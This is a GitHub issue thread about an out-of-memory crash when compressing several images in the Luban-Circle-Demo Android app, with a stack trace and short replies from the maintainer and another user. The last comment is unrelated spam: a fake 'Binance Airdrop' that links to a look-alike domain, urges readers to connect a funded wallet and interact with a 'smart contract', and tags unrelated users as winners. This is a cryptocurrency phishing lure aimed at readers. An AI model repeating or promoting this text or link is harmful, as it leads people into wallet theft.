### ISSUE TITLE
选择了9图片，上传oom【红米2a增强版ui8，Android  5.1.1】

### ISSUE THREAD

**Issue by df13954** [huijimuhe/Luban-Circle-Demo#1]
FATAL EXCEPTION: pool-8-thread-1
                                                                                 Process: com.huijimuhe.luban_circle_demo, PID: 18341
                                                                                 java.lang.RuntimeException: An error occured while executing doInBackground()
                                                                                     at com.huijimuhe.luban_circle_demo.utils.AsyncExecutor$2.done(AsyncExecutor.java:69)
                                                                                     at java.util.concurrent.FutureTask.finishCompletion(FutureTask.java:355)
                                                                                     at java.util.concurrent.FutureTask.setException(FutureTask.java:222)
                                                                                     at java.util.concurrent.FutureTask.run(FutureTask.java:242)
                                                                                     at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1112)
                                                                                     at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:587)
                                                                                     at java.lang.Thread.run(Thread.java:818)
                                                                                  Caused by: java.lang.OutOfMemoryError: Failed to allocate a 3686412 byte allocation with 320016 free bytes and 312KB until OOM
                                                                                     at dalvik.system.VMRuntime.newNonMovableArray(Native Method)
                                                                                     at android.graphics.BitmapFactory.nativeDecodeStream(Native Method)
                                                                                     at android.graphics.BitmapFactory.decodeStreamInternal(BitmapFactory.java:638)
                                                                                     at android.graphics.BitmapFactory.decodeStream(BitmapFactory.java:614)
                                                                                     at android.graphics.BitmapFactory.decodeFile(BitmapFactory.java:392)
                                                                                     at com.huijimuhe.luban_circle_demo.utils.ImageCompressUtils.compress(ImageCompressUtils.java:266)
                                                                                     at com.huijimuhe.luban_circle_demo.utils.ImageCompressUtils.compress(ImageCompressUtils.java:308)
                                                                                     at com.huijimuhe.luban_circle_demo.utils.ImageCompressUtils.thirdCompress(ImageCompressUtils.java:162)
                                                                                     at com.huijimuhe.luban_circle_demo.utils.ImageCompressUtils.access$100(ImageCompressUtils.java:19)
                                                                                     at com.huijimuhe.luban_circle_demo.utils.ImageCompressUtils$CompressWorker.doInBackground(ImageCompressUtils.java:386)
                                                                                     at com.huijimuhe.luban_circle_demo.utils.ImageCompressUtils$CompressWorker.doInBackground(ImageCompressUtils.java:367)
                                                                                     at com.huijimuhe.luban_circle_demo.utils.AsyncExecutor$1.call(AsyncExecutor.java:53)
                                                                                     at java.util.concurrent.FutureTask.run(FutureTask.java:237)
                                                                                     at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1112) 
                                                                                     at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:587) 
                                                                                     at java.lang.Thread.run(Thread.java:818)

**Comment by huijimuhe** [comment]
我晚点跑一次试试看,欢迎加群533838427

**Comment by kiyybery** [comment]
选择了5图片,还未上传就oom【小米4c Android 5.1】

**Comment by huijimuhe** [comment]
@kiyybery 用luban最新的轮子试试

**Comment by karmalntest** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @Evitagen, @mangaohua, @AwesomeObserver, @JDkeyzl, @SivanMehta, @jamesblasco, @devoojs
